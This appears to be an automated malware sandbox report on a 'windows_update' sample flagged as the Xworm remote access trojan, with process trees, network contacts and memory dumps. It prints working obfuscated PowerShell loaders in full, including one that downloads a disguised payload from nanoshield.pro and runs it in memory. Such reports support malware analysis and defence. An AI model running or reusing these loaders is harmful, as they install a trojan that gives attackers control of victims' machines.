C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\update.cmd';$LILq='LGNGQoGNGQadGNGQ'.Replace('GNGQ', ''),'ElevbZPmvbZPenvbZPtvbZPAvbZPtvbZP'.Replace('vbZP', ''),'InUMsVvoUMsVkUMsVeUMsV'.Replace('UMsV', ''),'CopFijyyTFijyoFijy'.Replace('Fijy', ''),'CZakhhaZakhnZakhgeEZakhxtZakhenZakhsZakhioZakhnZakh'.Replace('Zakh', ''),'ReyUhbayUhbdyUhbLiyUhbnesyUhb'.Replace('yUhb', ''),'SOZpUplOZpUitOZpU'.Replace('OZpU', ''),'TrMlaCanMlaCsMlaCfMlaCoMlaCrMlaCmFiMlaCnalMlaCBlMlaCockMlaC'.Replace('MlaC', ''),'MaXOkGiXOkGnXOkGModXOkGulXOkGeXOkG'.Replace('XOkG', ''),'EnkMdetrykMdePokMdeinkMdetkMde'.Replace('kMde', ''),'FrwpnfomwpnfBawpnfse6wpnf4Stwpnfrwpnfingwpnf'.Replace('wpnf', ''),'GemcvPtCmcvPurmcvPrmcvPenmcvPtPrmcvPocmcvPessmcvP'.Replace('mcvP', ''),'DecxpgKoxpgKmxpgKpxpgKresxpgKsxpgK'.Replace('xpgK', ''),'CrtTyceattTycetTycDetTyccrtTycypttTycortTyc'.Replace('tTyc', '');powershell -w hidden;function aPNpf($nVNGI){$htbMs=[System.Security.Cryptography.Aes]::Create();$htbMs.Mode=[System.Security.Cryptography.CipherMode]::CBC;$htbMs.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$htbMs.Key=[System.Convert]::($LILq[10])('/MlRmzNe+ZzBdBywbWhCQRBk9F+NMckIyZTwiuahK6M=');$htbMs.IV=[System.Convert]::($LILq[10])('XI44fhXZ241HbBx9GSgTSw==');$jJhvE=$htbMs.($LILq[13])();$EHnru=$jJhvE.($LILq[7])($nVNGI,0,$nVNGI.Length);$jJhvE.Dispose();$htbMs.Dispose();$EHnru;}function vSJcW($nVNGI){$EemcA=New-Object System.IO.MemoryStream(,$nVNGI);$NFsIp=New-Object System.IO.MemoryStream;$lBDbC=New-Object System.IO.Compression.GZipStream($EemcA,[IO.Compression.CompressionMode]::($LILq[12]));$lBDbC.($LILq[3])($NFsIp);$lBDbC.Dispose();$EemcA.Dispose();$NFsIp.Dispose();$NFsIp.ToArray();}$HrliX=[System.IO.File]::($LILq[5])([Console]::Title);$cGEtH=vSJcW (aPNpf ([Convert]::($LILq[10])([System.Linq.Enumerable]::($LILq[1])($HrliX, 5).Substring(2))));$IdyPm=vSJcW (aPNpf ([Convert]::($LILq[10])([System.Linq.Enumerable]::($LILq[1])($HrliX, 6).Substring(2))));[System.Reflection.Assembly]::($LILq[0])([byte[]]$IdyPm).($LILq[9]).($LILq[2])($null,$null);[System.Reflection.Assembly]::($LILq[0])([byte[]]$cGEtH).($LILq[9]).($LILq[2])($null,$null); "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network

N/A

Files

memory/2380-4-0x000000001B5B0000-0x000000001B892000-memory.dmp

memory/2380-5-0x0000000001F00000-0x0000000001F08000-memory.dmp

memory/2380-6-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

memory/2380-7-0x0000000002CA0000-0x0000000002D20000-memory.dmp

memory/2380-8-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

memory/2380-10-0x0000000002CA0000-0x0000000002D20000-memory.dmp

memory/2380-9-0x0000000002CA0000-0x0000000002D20000-memory.dmp

memory/2380-11-0x000007FEF5870000-0x000007FEF620D000-memory.dmp

memory/2380-12-0x0000000002CA0000-0x0000000002D20000-memory.dmp

memory/2380-13-0x0000000002CA0000-0x0000000002D20000-memory.dmp

memory/2380-14-0x0000000002CA0000-0x0000000002D20000-memory.dmp

memory/2380-15-0x0000000002CA0000-0x0000000002D20000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240221-en

Max time kernel

119s

Max time network

124s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\windows.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreB3DgTreGUDgTreYgBDDgTreGwDgTreaQBlDgTreG4DgTredDgTreDgTregDgTreD0DgTreIDgTreBODgTreGUDgTredwDgTretDgTreE8DgTreYgBqDgTreGUDgTreYwB0DgTreCDgTreDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBODgTreGUDgTredDgTreDgTreuDgTreFcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTrePQDgTregDgTreEcDgTreZQB0DgTreC0DgTreUgBhDgTreG4DgTreZDgTreBvDgTreG0DgTreIDgTreDgTretDgTreEkDgTrebgBwDgTreHUDgTredDgTreBPDgTreGIDgTreagBlDgTreGMDgTredDgTreDgTregDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreLQBDDgTreG8DgTredQBuDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreByDgTreGUDgTredDgTreB1DgTreHIDgTrebgDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTregDgTreH0DgTreOwDgTregDgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreaQBlDgTreGwDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreMgDgTreuDgTreGoDgTrecDgTreBnDgTreD8DgTreMQDgTre2DgTreDYDgTreMQDgTre1DgTreDQDgTreNwDgTreyDgTreDUDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTrebgBhDgTreG4DgTrebwBzDgTreGgDgTreZDgTreDgTreuDgTreHDgTreDgTrecgBvDgTreC8DgTreZgBpDgTreGwDgTreZQBzDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNDgTreDgTre0DgTreDQDgTreMQDgTre3DgTreDIDgTreMwDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreDgTre0DgTreCgDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreFMDgTreVDgTreBBDgTreFIDgTreVDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreRQBODgTreEQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreKQDgTre7DgTreCDgTreDgTreDQDgTreKDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTredDgTreBlDgTreHMDgTredDgTreBwDgTreG8DgTredwBlDgTreHIDgTrecwBoDgTreGUDgTrebDgTreBsDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTreNDgTreDgTreoDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreIDgTreDgTregDgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTrebDgTreBhDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreQQBjDgTreGQDgTreZDgTreBnDgTreG8DgTreaQDgTrevDgTreHMDgTreZQBsDgTreGkDgTreZgDgTrevDgTreG8DgTrecgBwDgTreC4DgTreZDgTreBsDgTreGUDgTreaQBoDgTreHMDgTrebwBuDgTreGEDgTrebgDgTrevDgTreC8DgTreOgBzDgTreHDgTreDgTredDgTreB0DgTreGgDgTreJwDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreLDgTreDgTregDgTreCcDgTreQQBkDgTreG8DgTreYgBlDgTreCcDgTreKQDgTrepDgTreH0DgTrefQDgTre=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.Acddgoi/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"

Network

Country Destination Domain Proto
US 8.8.8.8:53 nanoshd.pro udp
US 8.8.8.8:53 nanoshield.pro udp
US 172.67.203.108:443 nanoshield.pro tcp

Files

memory/2568-4-0x000000001B290000-0x000000001B572000-memory.dmp

memory/2568-5-0x0000000002720000-0x0000000002728000-memory.dmp

memory/2568-6-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

memory/2568-7-0x00000000029E0000-0x0000000002A60000-memory.dmp

memory/2568-8-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

memory/2568-9-0x00000000029E0000-0x0000000002A60000-memory.dmp

memory/2568-12-0x00000000029E0000-0x0000000002A60000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WN54W9QYDH7SV6P2RPM7.temp

MD5 e54a3dae0ebf5e9a1a83f9349e73d978
SHA1 d482945d5f50abbd8fc26ec617de0aa2ca75507d
SHA256 21d8f68917b146ca3407b74ab7f62afa33652d52c667b5ec664310fe5de19aee
SHA512 ae9a0ff56cc39a5d768ce747bc181e59b86c53d21d3bd8e614d42cbcb029446f4cf59ecfd9b5b678e71b58db4bc5e9af3c667bd9f2ed71b418fd7d6808a67c7f

memory/2568-10-0x00000000029E0000-0x0000000002A60000-memory.dmp

memory/2440-17-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

memory/2440-18-0x0000000002650000-0x00000000026D0000-memory.dmp

memory/2440-19-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

memory/2440-21-0x0000000002650000-0x00000000026D0000-memory.dmp

memory/2440-20-0x0000000002650000-0x00000000026D0000-memory.dmp

memory/2568-22-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

memory/2568-23-0x00000000029E0000-0x0000000002A60000-memory.dmp

memory/2568-24-0x00000000029E0000-0x0000000002A60000-memory.dmp

memory/2568-25-0x00000000029E0000-0x0000000002A60000-memory.dmp

memory/2440-26-0x000000001AAB0000-0x000000001AAFE000-memory.dmp

memory/2440-27-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

memory/2568-28-0x00000000029E0000-0x0000000002A60000-memory.dmp

memory/2568-29-0x000007FEF5C00000-0x000007FEF659D000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240221-en

Max time kernel

118s

Max time network

123s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\loader.ps1

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\loader.ps1

Network

N/A

Files

memory/3068-4-0x000000001B2B0000-0x000000001B592000-memory.dmp

memory/3068-6-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

memory/3068-5-0x00000000024D0000-0x00000000024D8000-memory.dmp

memory/3068-7-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/3068-8-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/3068-9-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/3068-10-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

memory/3068-11-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/3068-12-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

memory/3068-13-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/3068-14-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/3068-15-0x0000000002660000-0x00000000026E0000-memory.dmp

memory/3068-16-0x000007FEF5990000-0x000007FEF632D000-memory.dmp

memory/3068-17-0x0000000002660000-0x00000000026E0000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win7-20240221-en

Max time kernel

146s

Max time network

124s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\monitors.ps1

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\monitors.ps1

Network

N/A

Files

memory/2104-4-0x000000001B390000-0x000000001B672000-memory.dmp

memory/2104-5-0x00000000023E0000-0x00000000023E8000-memory.dmp

memory/2104-6-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

memory/2104-7-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

memory/2104-9-0x0000000002260000-0x00000000022E0000-memory.dmp

memory/2104-8-0x0000000002260000-0x00000000022E0000-memory.dmp

memory/2104-10-0x0000000002260000-0x00000000022E0000-memory.dmp

memory/2104-11-0x0000000002260000-0x00000000022E0000-memory.dmp

memory/2104-12-0x000007FEF5BB0000-0x000007FEF654D000-memory.dmp

memory/2104-13-0x0000000002260000-0x00000000022E0000-memory.dmp

memory/2104-14-0x0000000002260000-0x00000000022E0000-memory.dmp

memory/2104-15-0x0000000002260000-0x00000000022E0000-memory.dmp

memory/2104-16-0x0000000002260000-0x00000000022E0000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-04-19 07:49

Reported

2024-04-19 07:52

Platform

win10v2004-20240226-en

Max time kernel

142s

Max time network

159s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd"

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd"

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\upload.cmd

C:\Windows\system32\cmd.exe

cmd /c \"set __=^&rem\

C:\Windows\system32\cmd.exe

